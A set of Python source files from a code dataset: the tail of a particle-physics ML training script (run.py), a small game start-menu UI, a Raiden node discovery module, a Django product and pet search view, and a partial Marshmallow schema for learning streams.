'dnn2lSmall':{'epochs':20,'batch_size':32,'dropOut':None,'l2Regularization':None,'hiddenLayers':[0.66,0.3]},\n # 'dnn3lSmall':{'epochs':40,'batch_size':32,'dropOut':None,'l2Regularization':None,'hiddenLayers':[0.66,0.5,0.3]},\n\n # Bests\n # 4 vector\n # 'dnn3l_2p0n_do0p25':{'epochs':40,'batch_size':32,'dropOut':0.25,'l2Regularization':None,'hiddenLayers':[2.0,2.0,2.0]},\n # 'dnn3l_2p0n_do0p25_batch128':{'epochs':40,'batch_size':128,'dropOut':0.25,'l2Regularization':None,'hiddenLayers':[2.0,2.0,2.0]},\n # 'dnn3l_2p0n_do0p25_batch1024':{'epochs':40,'batch_size':1024,'dropOut':0.25,'l2Regularization':None,'hiddenLayers':[2.0,2.0,2.0]},\n # 'dnn3l_2p0n_do0p25_batch2048':{'epochs':40,'batch_size':2048,'dropOut':0.25,'l2Regularization':None,'hiddenLayers':[2.0,2.0,2.0]},\n 'dnn3l_2p0n_do0p25_batch4096': {'epochs': 80, 'batch_size': 4096, 'dropOut': 0.25, 'l2Regularization': None,\n 'hiddenLayers': [2.0, 2.0, 2.0]},\n # 'dnn3l_2p0n_do0p25_batch8192':{'epochs':40,'batch_size':8192,'dropOut':0.25,'l2Regularization':None,'hiddenLayers':[2.0,2.0,2.0]},\n # 'dnn5l_1p0n_do0p25':{'epochs':40,'batch_size':32,'dropOut':0.25,'l2Regularization':None,'hiddenLayers':[1.0,1.0,1.0,1.0,1.0]},\n # 'dnn4l_2p0n_do0p25':{'epochs':40,'batch_size':32,'dropOut':0.25,'l2Regularization':None,'hiddenLayers':[2.0,2.0,2.0,2.0]},\n # 'dnn2lWide':{'epochs':30,'batch_size':32,'dropOut':0.25,'hiddenLayers':[2.0,2.0]},\n}\n\n\n# If doing the grid search\ndef hiddenLayerGrid(nLayers, nNodes):\n hlg = []\n for nn in nNodes:\n for nl in nLayers:\n hlg.append([nn for x in range(nl)])\n pass\n return hlg\n\n\ndnnGridParams = dict(\n mlp__epochs=[10, 20, 50],\n mlp__batch_size=[32, 64],\n mlp__hiddenLayers=hiddenLayerGrid([1, 2, 3, 4, 5], [2.0, 1.0, 0.5]),\n mlp__dropOut=[None, 0.25, 0.5],\n # mlp__activation=['relu','sigmoid','tanh'],\n # mlp__optimizer=['adam','sgd','rmsprop'],\n ## NOT IMPLEMENTED YET:\n # mlp__learningRate=[0.5,1.0],\n # mlp__weightConstraint=[1.0,3.0,5.0]\n)\n\nbdtGridParams = dict(\n base_estimator__max_depth=[3, 5],\n base_estimator__min_samples_leaf=[0.05, 0.2],\n n_estimators=[400, 800]\n)\n\nif __name__ == '__main__':\n\n #############################################################\n # Either make the dataframes fresh from the trees or just read them in\n if makeDfs:\n print(\"Making DataFrames\")\n\n signalFile = [] # '/nfs/dust/cms/group/susy-desy/marco/training_sample_new/stop_sample_0.root'\n bkgdFile = [] # '/nfs/dust/cms/group/susy-desy/marco/training_sample_new/top_sample_0.root'\n\n for i in range(nInputFiles):\n signalFile.append(\n '/nfs/dust/cms/user/dydukhle/DelphesPythia8/Delphes-3.4.1/trainting_samples/stop_samples_' + str(\n i) + '.root')\n bkgdFile.append(\n '/nfs/dust/cms/group/susy-desy/marco/backup/training_samples/top_sample_' + str(i) + '.root')\n\n signal = convertTree(signalFile, signal=True, passFilePath=True, tlVectors=['selJet', 'sel_lep'])\n bkgd = convertTree(bkgdFile, signal=False, passFilePath=True, tlVectors=['selJet', 'sel_lep'])\n\n # #Expand the variables to 1D\n signal = expandArrays(signal)\n bkgd = expandArrays(bkgd)\n\n if saveDfs:\n print('Saving the dataframes')\n # Save the dfs?\n if not os.path.exists('dfs'): os.makedirs('dfs')\n signal.to_pickle('dfs/_signal.pkl')\n bkgd.to_pickle('dfs/_bkgd.pkl')\n else:\n print(\"Loading DataFrames\")\n\n signal = pd.read_pickle('dfs/_signal.pkl')\n bkgd = pd.read_pickle('dfs/_bkgd.pkl')\n \"\"\"\n Makes the plots \n \"\"\"\n if makePlots:\n print(\"Making plots\")\n # Skip out excessive jet info\n exceptions = []\n for k in signal.keys():\n if 'selJet' in k or '_x' in k or '_y' in k or '_z' in k:\n exceptions.append(k)\n signalPlotter = Plotter(signal.copy(), 'testPlots/signal', exceptions=exceptions)\n bkgdPlotter = Plotter(bkgd.copy(), 'testPlots/bkgd', exceptions=exceptions)\n\n signalPlotter.plotAllHists1D(withErrors=True)\n signalPlotter.correlations()\n bkgdPlotter.plotAllHists1D(withErrors=True)\n bkgdPlotter.correlations()\n pass\n\n #############################################################\n # Carry out the organisation of the inputs or read them in if it's already done\n if prepareInputs:\n # Put the data in a format for the machine learning: \n # combine signal and background with an extra column indicating which it is\n\n signal['signal'] = 1\n bkgd['signal'] = 0\n\n combined = pd.concat([signal, bkgd])\n\n # Now add the relevant variables to the DFs (make gram matrix)\n\n # Make a matrix of J+L x J+L where J is the number of jets and L is the number of leptons\n # Store it as a numpy matrix in the dataframe\n\n # METHOD 1:\n # Store as a matrix in the numpy array\n # It's better for it to be flat for machine learning... so using method 2\n\n # Use function that takes (4x) arrays of objects (for E,px,py,pz) and returns matrix\n # Must store it as an array of arrays as 2D numpy objects can't be stored in pandas\n\n # print 'm',signal['selJet_m'][0]+signal['sel_lep_m'][0]\n # signal['gram'] = signal.apply(lambda row: gram(row['sel_lep_e']+[row['MET']]+row['selJet_e'],\\\n # row['sel_lep_px']+[row['MET']*math.cos(row['METPhi'])]+row['selJet_px'],\\\n # row['sel_lep_py']+[row['MET']*math.sin(row['METPhi'])]+row['selJet_py'],\\\n # row['sel_lep_pz']+[0]+row['selJet_pz']),axis=1)\n #\n # bkgd['gram'] = bkgd.apply(lambda row: gram(row['sel_lep_e']+[row['MET']]+row['selJet_e'],\\\n # row['sel_lep_px']+[row['MET']*math.cos(row['METPhi'])]+row['selJet_px'],\\\n # row['sel_lep_py']+[row['MET']*math.sin(row['METPhi'])]+row['selJet_py'],\\\n # row['sel_lep_pz']+[0]+row['selJet_pz']),axis=1)\n\n # METHOD 2:\n # Put MET into the same format as the other objects\n if addGramMatrix:\n print('Producing GRAM matrix')\n combined['MET_e'] = combined['MET']\n combined.drop('MET', axis=1) # Drop the duplicate\n combined['MET_px'] = combined['MET'] * np.cos(combined['METPhi'])\n combined['MET_py'] = combined['MET'] * np.sin(combined['METPhi'])\n combined['MET_pz'] = 0\n nSelLep = 0\n nSelJet = 0\n for k in combined.keys():\n if 'sel_lep_px' in k: nSelLep += 1\n if 'selJet_px' in k: nSelJet += 1\n addGramToFlatDF(combined, single=['MET'], multi=[['sel_lep', nSelLep], ['selJet', nSelJet]])\n\n # if saveDfs:\n print('Saving prepared files')\n combined.to_pickle('dfs/_combined.pkl')\n else:\n combined = pd.read_pickle('dfs/_combined.pkl')\n\n # Now carry out machine learning (with some algo specific diagnostics)\n # Choose the variables to train on\n\n chosenVars = {\n # Just the gram matrix, with or without b info\n # 'gram':['signal','gram'],\n #\n # 'gramBL':['signal','gram','selJetB','lep_type'],\n #\n # 'gramMT':['signal','gram','MT'],\n #\n # 'gramMT2W':['signal','gram','MT2W'],\n #\n # 'gramHT':['signal','gram','HT'],\n #\n # #The 4 vectors only\n # 'fourVector':['signal',\n # 'sel_lep_pt','sel_lep_eta','sel_lep_phi','sel_lep_m',\n # 'selJet_phi','selJet_pt','selJet_eta','selJet_m','MET'],\n #\n # 'fourVectorBL':['signal','lep_type','selJetB',\n # 'sel_lep_pt','sel_lep_eta','sel_lep_phi','sel_lep_m',\n # 'selJet_phi','selJet_pt','selJet_eta','selJet_m','MET'],\n #\n # 'fourVectorMT':['signal',\n # 'sel_lep_pt','sel_lep_eta','sel_lep_phi','sel_lep_m',\n # 'selJet_phi','selJet_pt','selJet_eta','selJet_m','MET','MT'],\n #\n # 'fourVectorMT2W':['signal',\n # 'sel_lep_pt','sel_lep_eta','sel_lep_phi','sel_lep_m',\n # 'selJet_phi','selJet_pt','selJet_eta','selJet_m','MET','MT2W'],\n #\n # 'fourVectorHT':['signal',\n # 'sel_lep_pt','sel_lep_eta','sel_lep_phi','sel_lep_m',\n # 'selJet_phi','selJet_pt','selJet_eta','selJet_m','MET','HT'],\n #\n # #A vanilla analysis with HL variables and lead 3 jets\n 'vanilla': ['signal', 'HT', 'MET', 'MT', 'MT2W', 'n_jet', 'lep_type'\n 'n_bjet', 'sel_lep_pt', 'sel_lep_eta', 'sel_lep_phi',\n 'selJet_phi0', 'selJet_pt0', 'selJet_eta0', 'selJet_m0',\n 'selJet_phi1', 'selJet_pt1', 'selJet_eta1', 'selJet_m1',\n 'selJet_phi2', 'selJet_pt2', 'selJet_eta2', 'selJet_m2'],\n\n }\n\n trainedModels = {}\n\n for varSetName, varSet in chosenVars.iteritems():\n\n # Pick out the expanded arrays\n columnsInDataFrame = []\n for k in combined.keys():\n for v in varSet:\n # Little trick to ensure only the start of the string is checked\n if ' ' + v in ' ' + k: columnsInDataFrame.append(k)\n\n # Select just the features we're interested in\n # For now setting NaNs to 0 for compatibility\n combinedToRun = combined[columnsInDataFrame].copy()\n combinedToRun.fillna(0, inplace=True)\n\n #############################################################\n # Now everything is ready can start the machine learning\n\n if plotFeatureImportances:\n print('Making feature importances')\n # Find the feature importance with a random forest classifier\n featureImportance(combinedToRun, 'signal', 'testPlots/mlPlots/' + varSetName + '/featureImportance')\n\n print('Splitting up data')\n\n mlData = MlData(combinedToRun, 'signal')\n\n # Now split pseudorandomly into training and testing\n # Split the development set into training and testing\n # (forgetting about evaluation for now)\n\n mlData.prepare(evalSize=0.2, testSize=0.2, limitSize=limitSize)\n\n if doBDT:\n\n if doGridSearch:\n print('Running BDT grid search')\n bdt = Bdt(mlData, 'testPlots/mlPlots/' + varSetName + '/bdtGridSearch')\n bdt.setup()\n bdt.gridSearch(param_grid=bdtGridParams, kfolds=3, n_jobs=4)\n\n elif not doRegression:\n # Start with a BDT from sklearn (ala TMVA)\n print('Defining and fitting BDT')\n bdt = Bdt(mlData, 'testPlots/mlPlots/' + varSetName + '/bdt')\n bdt.setup()\n bdt.fit()\n if doCrossVal:\n print(' > Carrying out cross validation')\n bdt.crossValidation(kfolds=5)\n if makeLearningCurve:\n print(' > Making learning curves')\n bdt.learningCurve(kfolds=5, n_jobs=3)\n\n # and carry out a diagnostic of the results\n print(' > Producing diagnostics')\n bdt.diagnostics()\n\n trainedModels[varSetName + '_bdt'] = bdt\n\n if doDNN:\n\n if doGridSearch:\n print('Running DNN grid search')\n dnn = Dnn(data=mlData, output='testPlots/mlPlots/' + varSetName + '/dnnGridSearch')\n dnn.setup()\n dnn.gridSearch(param_grid=dnnGridParams, kfolds=3, epochs=20, batch_size=32, n_jobs=4)\n\n if doRegression:\n\n for name, config in dnnConfigs.iteritems():\n\n for regressionVar in regressionVars:\n\n if regressionVar not in varSet: continue\n\n # Drop unconverged events for MT2\n if regressionVar is 'MT2W':\n toRunRegression = combinedToRun[combinedToRun.MT2W != 999.0]\n else:\n toRunRegression = combinedToRun\n\n mlDataRegression = MlData(toRunRegression.drop('signal'), regressionVar)\n mlDataRegression.prepare(evalSize=0.0, testSize=0.2, limitSize=limitSize, standardise=False)\n\n print('Defining and fitting DNN', name, 'Regression', regressionVar)\n dnn = Dnn(mlDataRegression, 'testPlots/mlPlots/regression/' + varSetName + '/' + name,\n doRegression=True)\n dnn.setup(hiddenLayers=config['hiddenLayers'], dropOut=config['dropOut'],\n l2Regularization=config['l2Regularization'])\n dnn.fit(epochs=config['epochs'], batch_size=config['batch_size'])\n dnn.save()\n\n if makeLearningCurve:\n print(' > Making learning curves')\n dnn.learningCurve(kfolds=3, n_jobs=1, scoring='neg_mean_squared_error')\n\n print(' > Producing diagnostics')\n dnn.diagnostics()\n\n\n else:\n # Now lets move on to a deep neural net\n for name, config in dnnConfigs.iteritems():\n\n if normalLoss:\n print('Defining and fitting DNN', name)\n output_path = \"testPlots/mlPlots/{0}/{1}/{2}\".format(varSetName, name, VORNAME)\n dnn = Dnn(data=mlData, output=output_path)\n dnn.setup(hiddenLayers=config['hiddenLayers'],\n dropOut=config['dropOut'],\n l2Regularization=config['l2Regularization'],\n extraMetrics=[\n significanceLoss(expectedSignal, expectedBkgd),\n significanceFull(expectedSignal, expectedBkgd),\n asimovSignificanceFull(expectedSignal, expectedBkgd, systematic), truePositive,\n falsePositive\n ])\n dnn.fit(epochs=config['epochs'], batch_size=config['batch_size'])\n dnn.save()\n if doCrossVal:\n print(' > Carrying out cross validation')\n dnn.crossValidation(kfolds=5, epochs=config['epochs'], batch_size=config['batch_size'])\n if makeLearningCurve:\n print(' > Making learning curves')\n dnn.learningCurve(kfolds=5, n_jobs=1)\n\n print(' > Producing diagnostics')\n dnn.diagnostics(batchSize=8192)\n dnn.makeHepPlots(expectedSignal, expectedBkgd, systematic, makeHistograms=False)\n\n trainedModels[varSetName + '_' + name] = dnn\n\n if sigLoss:\n print('Defining and fitting DNN with significance loss function', name)\n output_path = \"testPlots/mlPlots/sigLoss/{0}/{1}/{2}\".format(varSetName, name, VORNAME)\n dnn = Dnn(data=mlData, output=output_path)\n dnn.setup(hiddenLayers=config['hiddenLayers'], dropOut=config['dropOut'],\n l2Regularization=config['l2Regularization'],\n loss=significanceLoss(expectedSignal, expectedBkgd),\n extraMetrics=[\n significanceLoss(expectedSignal, expectedBkgd),\n significanceFull(expectedSignal, expectedBkgd),\n asimovSignificanceFull(expectedSignal, expectedBkgd, systematic), truePositive,\n falsePositive\n ])\n dnn.fit(epochs=config['epochs'], batch_size=config['batch_size'])\n dnn.save()\n print(' > Producing diagnostics')\n dnn.diagnostics(batchSize=8192)\n dnn.makeHepPlots(expectedSignal, expectedBkgd, systematic, makeHistograms=True)\n trainedModels[varSetName + '_sigLoss_' + name] = dnn\n\n if sigLossInvert:\n print('Defining and fitting DNN with significance loss function', name)\n output_path = \"testPlots/mlPlots/sigLossInvert/{0}/{1}/{2}\".format(varSetName, name, VORNAME)\n dnn = Dnn(mlData, 'testPlots/mlPlots/sigLossInvert/' + varSetName + '/' + name)\n dnn.setup(hiddenLayers=config['hiddenLayers'], dropOut=config['dropOut'],\n l2Regularization=config['l2Regularization'],\n loss=significanceLossInvert(expectedSignal, expectedBkgd),\n extraMetrics=[\n significanceLoss(expectedSignal, expectedBkgd),\n significanceFull(expectedSignal, expectedBkgd),\n asimovSignificanceFull(expectedSignal, expectedBkgd, systematic), truePositive,\n falsePositive\n ])\n dnn.fit(epochs=config['epochs'], batch_size=config['batch_size'])\n dnn.save()\n print(' > Producing diagnostics')\n dnn.diagnostics(batchSize=8192)\n dnn.makeHepPlots(expectedSignal, expectedBkgd, systematic, makeHistograms=True)\n trainedModels[varSetName + '_sigLossInvert_' + name] = dnn\n\n if asimovSigLossInvert:\n print('Defining and fitting DNN with significance loss function', name)\n output_path = \"testPlots/mlPlots/asimovSigLossInvert/{0}/{1}/{2}\".format(varSetName, name,\n VORNAME)\n dnn = Dnn(mlData, output=output_path)\n dnn.setup(hiddenLayers=config['hiddenLayers'], dropOut=config['dropOut'],\n l2Regularization=config['l2Regularization'],\n loss=asimovSignificanceLossInvert(expectedSignal, expectedBkgd, systematic),\n extraMetrics=[\n significanceLoss(expectedSignal, expectedBkgd),\n significanceFull(expectedSignal, expectedBkgd),\n asimovSignificanceFull(expectedSignal, expectedBkgd, systematic), truePositive,\n falsePositive\n ])\n dnn.fit(epochs=config['epochs'], batch_size=config['batch_size'])\n dnn.save()\n print(' > Producing diagnostics')\n dnn.diagnostics(batchSize=8192)\n dnn.makeHepPlots(expectedSignal, expectedBkgd, systematic, makeHistograms=False)\n\n trainedModels[varSetName + '_asimovSigLossInvert_' + name] = dnn\n\n if asimovSigLoss:\n print('Defining and fitting DNN with asimov significance loss function', name)\n output_path = \"testPlots/mlPlots/asimovSigLoss/{0}/{1}/{2}\".format(varSetName, name, VORNAME)\n dnn = Dnn(mlData, output=output_path)\n dnn.setup(hiddenLayers=config['hiddenLayers'], dropOut=config['dropOut'],\n l2Regularization=config['l2Regularization'],\n loss=asimovSignificanceLoss(expectedSignal, expectedBkgd, systematic),\n extraMetrics=[\n asimovSignificanceLoss(expectedSignal, expectedBkgd, systematic),\n asimovSignificanceFull(expectedSignal, expectedBkgd, systematic),\n significanceFull(expectedSignal, expectedBkgd), truePositive, falsePositive\n ])\n\n dnn.fit(epochs=config['epochs'], batch_size=config['batch_size'])\n dnn.save()\n print(' > Producing diagnostics')\n dnn.diagnostics(batchSize=8192)\n dnn.makeHepPlots(expectedSignal, expectedBkgd, systematic, makeHistograms=False)\n\n trainedModels[varSetName + '_asimovSigLoss_' + name] = dnn\n\n pass\n\n pass # end of variable set loop\n\n # Compare all the results\n if not doGridSearch and not doRegression:\n # Now compare all the different versions\n compareMl = ComparePerformances(trainedModels, output='testPlots/mlPlots/comparisons')\n\n compareMl.compareRoc(append='_all')\n compareMl.rankMethods()\n\n compareMl.compareRoc(['gram_dnn', 'gram_dnn3l_2p0n_do0p25', 'gram_dnn5l_1p0n_do0p25', 'gram_dnn4l_2p0n_do0p25'],\n append='_gramOnly')\n compareMl.compareRoc(['fourVector_dnn', 'fourVector_dnn3l_2p0n_do0p25', 'fourVector_dnn5l_1p0n_do0p25',\n 'fourVector_dnn4l_2p0n_do0p25'], append='_fourVectorOnly')\n compareMl.compareRoc(['fourVector_dnn', 'fourVector_dnn3l_2p0n_do0p25', 'fourVector_dnn5l_1p0n_do0p25',\n 'fourVector_dnn4l_2p0n_do0p25'], append='_fourVectorOnly')\n\n # #compareMl.compareRoc(['gram_dnn2l','gramMT_dnn2l','gramHT_dnn2l','gramMT2W_dnn2l','gramBL_dnn2l'],append='_gramOnlyDNN2l')\n # compareMl.compareRoc(['gram_dnn2ldo0p2','gramMT_dnn2ldo0p2','gramHT_dnn2ldo0p2','gramMT2W_dnn2ldo0p2','gramBL_dnn2ldo0p2'],append='_gramOnlyDNN2ldo0p2')\n # compareMl.compareRoc(['gram_dnn3ldo0p2','gramMT_dnn3ldo0p2','gramHT_dnn3ldo0p2','gramMT2W_dnn3ldo0p2','gramBL_dnn3ldo0p2'],append='_gramOnlyDNN3ldo0p2')\n # compareMl.compareRoc(['gram_bdt','gramMT_bdt','gramHT_bdt','gramMT2W_bdt','gramBL_bdt'], append='_gramOnlyBDT')\n #\n # compareMl.compareRoc(['fourVector_dnn','fourVectorMT_dnn','fourVectorHT_dnn','fourVectorMT2W_dnn','fourVectorBL_dnn'],append='_fourVectorOnlyDNN')\n # #compareMl.compareRoc(['fourVector_dnn2l','fourVectorMT_dnn2l','fourVectorHT_dnn2l','fourVectorMT2W_dnn2l','fourVectorBL_dnn2l'],append='_fourVectorOnlyDNN2l')\n # compareMl.compareRoc(['fourVector_dnn2ldo0p2','fourVectorMT_dnn2ldo0p2','fourVectorHT_dnn2ldo0p2','fourVectorMT2W_dnn2ldo0p2','fourVectorBL_dnn2ldo0p2'],append='_fourVectorOnlyDNN2ldo0p2')\n # compareMl.compareRoc(['fourVector_dnn3ldo0p2','fourVectorMT_dnn3ldo0p2','fourVectorHT_dnn3ldo0p2','fourVectorMT2W_dnn3ldo0p2','fourVectorBL_dnn3ldo0p2'],append='_fourVectorOnlyDNN3ldo0p2')\n # compareMl.compareRoc(['fourVector_bdt','fourVectorMT_bdt','fourVectorHT_bdt','fourVectorMT2W_bdt','fourVectorBL_bdt'], append='_fourVectorOnlyBDT')\n #\n compareMl.compareRoc(['gram_dnn5l_1p0n_do0p25', 'gram_bdt',\n 'fourVector_dnn3l_2p0n_do0p25', 'fourVector_bdt',\n 'vanilla_dnn3l_2p0n_do0p25', 'vanilla_dnn5l_1p0n_do0p25', 'vanilla_bdt'],\n append='_vanillaComparisons')\n #\n\n # DNN study\n # compareMl = ComparePerformances(trainedModels,output='testPlots/mlPlots/dnnStudy')\n compareMl.compareRoc(append='_all')\n # compareMl.rankMethods()\n # #BDT study\n # compareMl = ComparePerformances(trainedModels,output='testPlots/mlPlots/bdtStudy')\n # compareMl.compareRoc(append='_all')\n # compareMl.rankMethods()\n\n pass\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":30071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"400950179","text":"#coding=utf-8\n#import libs\nimport GameFun \nimport Scene2\n\nclass GameUI(GameFun.Label):\n def __init__(self):\n super(GameUI, self).__init__()\n self.SetWidth(480)\n self.SetHeight(640)\n self.label_2 = GameFun.Label(self,52,170,\"\",\"Arial\",16)\n self.label_2.SetWidth(310)\n self.label_2.SetHeight(99)\n self.label_2.SetImage(\"ui\",\"title.png\",False)\n self.button_3 = GameFun.Button(self,150,366)\n self.button_3.SetWidth(162)\n self.button_3.SetHeight(50)\n self.button_3.SetImage(\"ui\",\"restart1.png\")\n self.button_3.SetPickUpFunction(self.button_3_PickUp)\n self.button_4 = GameFun.Button(self,153,453)\n self.button_4.SetWidth(159)\n self.button_4.SetHeight(45)\n self.button_4.SetImage(\"ui\",\"exit1.png\")\n self.button_4.SetPickUpFunction(self.button_4_PickUp)\n def OnLoad(self,sceneInstance):\n super(GameUI, self).OnLoad(sceneInstance)\n def button_3_PickUp(self,uiNode):\n sceneInstance = uiNode.GetSceneInstance()\n uiLayer1 = sceneInstance.GetLayer(\"UI\")\n uiLayer1.SetVisible(False)\n scene2 = Scene2.Scene()\n GameFun.gameAppInstance.SetCurrentScene(scene2)\n GameFun.gameAppInstance.SetBindingVar(\"KillCount\",0)\n def button_4_PickUp(self,uiNode):\n GameFun.gameAppInstance.exit() ","sub_path":"Examples/AircraftWar/StartGameUI.py","file_name":"StartGameUI.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"432193864","text":"# -*- coding: utf-8 -*-\nimport socket\n\nfrom ethereum import slogging\n\nfrom raiden.exceptions import UnknownAddress\nfrom raiden.utils import (\n host_port_to_endpoint,\n isaddress,\n pex,\n split_endpoint,\n)\nfrom raiden.exceptions import InvalidAddress\n\nlog = slogging.getLogger(__name__)\n\n\nclass Discovery(object):\n \"\"\" Mock mapping address: host, port \"\"\"\n\n def __init__(self):\n self.nodeid_to_hostport = dict()\n\n def register(self, node_address, host, port):\n if not isaddress(node_address):\n raise ValueError('node_address must be a valid address')\n\n try:\n socket.inet_pton(socket.AF_INET, host)\n except OSError:\n raise ValueError('invalid ip address provided: {}'.format(host))\n\n if not isinstance(port, (int, long)):\n raise ValueError('port must be a valid number')\n\n self.nodeid_to_hostport[node_address] = (host, port)\n\n def get(self, node_address):\n try:\n return self.nodeid_to_hostport[node_address]\n except KeyError:\n raise InvalidAddress('Unknown address {}'.format(pex(node_address)))\n\n def nodeid_by_host_port(self, host_port):\n for nodeid, value_hostport in self.nodeid_to_hostport.items():\n if value_hostport == host_port:\n return nodeid\n return None\n\n\nclass ContractDiscovery(Discovery):\n \"\"\" Raiden node discovery.\n\n Allows registering and looking up by endpoint (host, port) for node_address.\n \"\"\"\n\n def __init__(self, node_address, discovery_proxy):\n super(ContractDiscovery, self).__init__()\n\n self.node_address = node_address\n self.discovery_proxy = discovery_proxy\n\n def register(self, node_address, host, port):\n if node_address != self.node_address:\n raise ValueError('You can only register your own endpoint.')\n\n if not isaddress(node_address):\n raise ValueError('node_address must be a valid address')\n\n try:\n socket.inet_pton(socket.AF_INET, host)\n except OSError:\n raise ValueError('invalid ip address provided: {}'.format(host))\n\n if not isinstance(port, (int, long)):\n raise ValueError('port must be a valid number')\n\n try:\n current_value = self.get(node_address)\n except UnknownAddress:\n current_value = None\n\n if current_value == (host, port):\n log.info(\n 'endpoint already registered',\n node_address=pex(node_address),\n host=host,\n port=port\n )\n else:\n endpoint = host_port_to_endpoint(host, port)\n self.discovery_proxy.register_endpoint(node_address, endpoint)\n log.info(\n 'registered endpoint in discovery',\n node_address=pex(node_address),\n host=host,\n port=port\n )\n\n def get(self, node_address):\n endpoint = self.discovery_proxy.endpoint_by_address(node_address)\n host_port = split_endpoint(endpoint)\n return host_port\n\n def nodeid_by_host_port(self, host_port):\n host, port = host_port\n endpoint = host_port_to_endpoint(host, port)\n return self.discovery_proxy.address_by_endpoint(endpoint)\n\n def version(self):\n return self.discovery_proxy.version()\n","sub_path":"raiden/network/discovery.py","file_name":"discovery.py","file_ext":"py","file_size_in_byte":3394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"422861231","text":"import json\nimport logging\n\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.db.models import Sum\nfrom django.http import HttpResponse\n\nfrom apps.ventas.models.Producto import Producto\nfrom ..models.cliente import Cliente\nfrom ..models.mascota import Mascota\n\nlog = logging.getLogger(__name__)\n\n\ndef BuscarProducto(request):\n if request.is_ajax():\n q = request.GET.get('term', '')\n results = []\n productos = Producto.objects.filter(\n nombre__icontains=q).annotate(\n stock=Sum('almacen__existencia'))\n for producto in productos[:5]:\n producto_json = {}\n producto_json['id'] = producto.id\n producto_json['label'] = producto.nombre\n producto_json['value'] = producto.nombre\n producto_json['nombre'] = producto.nombre\n producto_json['precioV'] = producto.precioV\n producto_json['existencia'] = producto.stock\n # compras\n producto_json['precioC'] = producto.precioC\n producto_json['unidad_medida'] = producto.unidad_medida.nombre\n producto_json[\n 'unidad_medida_nombre'] = producto.unidad_medida.cant_equivalencia\n # producto_json['igv'] = producto.igv\n results.append(producto_json)\n data = json.dumps(results, cls=DjangoJSONEncoder)\n else:\n data = 'No se puede obtener datos'\n mimetype = 'application/json'\n return HttpResponse(data, mimetype)\n\n\ndef get_drugs(request):\n if request.is_ajax():\n q = request.GET.get('term', '')\n\n results = []\n drugs = Mascota.objects.filter(\n duenho__persona__first_name__contains=q)[:20]\n print(\"IMprimeido los drugs\", drugs)\n if drugs:\n print(\"holaaaaaaaaaaaaaaaaaaa\")\n drugs = Mascota.objects.filter(\n duenho__persona__first_name__contains=q)[:20]\n\n results = []\n for drug in drugs:\n drug_json = {}\n drug_json['id'] = drug.id\n drug_json['nombre_mascota'] = drug.nombre\n drug_json['label'] = drug.duenho.persona.first_name + \\\n ' ' + drug.nombre\n drug_json['value'] = drug.duenho.persona.first_name\n drug_json['cliente_id'] = drug.duenho.id\n\n # drug_json['pk'] = serializers.serialize('json', drug.mascotas.all(), fields=('id','nombre'))\n # drug_json['mascota_atencion'] = drug.nombre\n results.append(drug_json)\n print(results)\n if not drugs:\n print(\"fgggggggggggggggggggg\")\n drugs = Cliente.objects.filter(\n persona__first_name__contains=q)[:20]\n results = []\n for drug in drugs:\n drug_json = {}\n drug_json['cliente_id'] = drug.id\n drug_json['label'] = drug.persona.first_name\n drug_json['value'] = drug.persona.first_name\n # drug_json['pk'] = serializers.serialize('json', drug.mascotas.all(), fields=('id','nombre'))\n # drug_json['mascota_atencion'] = drug.nombre\n results.append(drug_json)\n print(results)\n data = json.dumps(results)\n else:\n data = 'No se puede obtener datos'\n mimetype = 'application/json'\n return HttpResponse(data, mimetype)\n","sub_path":"apps/clinica/views/vacunacionviews.py","file_name":"vacunacionviews.py","file_ext":"py","file_size_in_byte":3422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"277277270","text":"from .baseschema import ma\nfrom src.models.learning_stream import LearningStream, LearningStreamLearningPractices, LearningStreamTags\nfrom marshmallow import fields, post_dump, pre_load\nfrom src.database.utils.crud import read_rows\nfrom nltk.tokenize import TweetTokenizer\nfrom src.database.db import get_db_session\nimport re\nimport string \nclass LearningStreamSchema(ma.ModelSchema):\n learningStreamTags = fields.Nested('LearningStreamTagsSchema',\n many = True,\n exclude = ('learningStream', 'learningStreamId'),\n dump_only = True)\n tags = fields.Nested('TagSchema',\n many = True,\n exclude = ('episodeTags', 'episodes',\n 'learningPointTags', 'learningPoints',\n 'learningPracticeTags', 'learningPractices',\n 'learningStreamTags', 'learningStreams'))\n learningStreamLearningPractices = fields.Nested( 'LearningStreamLearningPracticesSchema',\n many = True,\n exclude = ('learningStream', 'learningStreamId'),\n dump_only = True\n )\n learningPractices = fields.Nested('LearningStreamLearningPracticesSchema',\n many = True,\n exclude = ('learningStreamLearningPractices' , 'LearningStreams'))\n class Meta:\n model = LearningStream\n init_session, _ = get_db_session()\n sqla_session = init_session\n href = ma.Hyperlinks(\n {\n 'self': [\n ma.URLFor('apiV1_0.learning_streams_id', id = ''),\n ma.URLFor('apiV1_0.learning_streams_slug', slug = '')\n ],\n 'collection': ma.URLFor('apiV1_0.learning_streams')\n }\n )\n @pre_load\n def check_data(self, data):\n if data.get('id') is None:\n if data.get('name') is None:\n raise ValueError('Must Include name')\n punct = set(string.punctuation)\n #if both the id and the slug is none then this is a completely new blog\n #generate the slug from the title by tokenizing the lowered title and filtering for only alphanumeric characters\n #then use the join method on the filtered slug tokens to form a slug_like_this from ['slug','like','this']\n slug_array = TweetTokenizer().tokenize(data['name'].lower())\n if len(slug_array) == 1:\n data['slug'] = slug_array[0]\n else:\n slug_array = list(filter(lambda x: not re.match(\"(\\\\d|\\\\W)+\", x) and not x in punct, slug_array))\n data['slug'] = '_'.join(slug_array)\n query = read_rows(LearningStream, filters= [\n {\n 'slug': {\n 'comparitor': '==',\n 'data': data['slug']\n }\n }\n ]).one_or_none()\n count = 1\n #loop over until you find a unique slug by appending an incrementing count to the end of the slug\n while query is not None:\n slug = data['slug'] + '_' + str(count)\n query = read_rows(LearningStream, filters= [\n {\n 'slug': {\n 'comparitor': '==',\n 'data': slug\n }\n }\n ]).one_or_none()\n data['slug'] = slug\n count += 1\n else:\n for key in list(data.keys()):\n if key != 'id':\n del data[key]\n @post_dump\n def clean_up(self,data):\n if data.get('learningStreamLearningPractices') is not None:\n data['learningPractices'] = 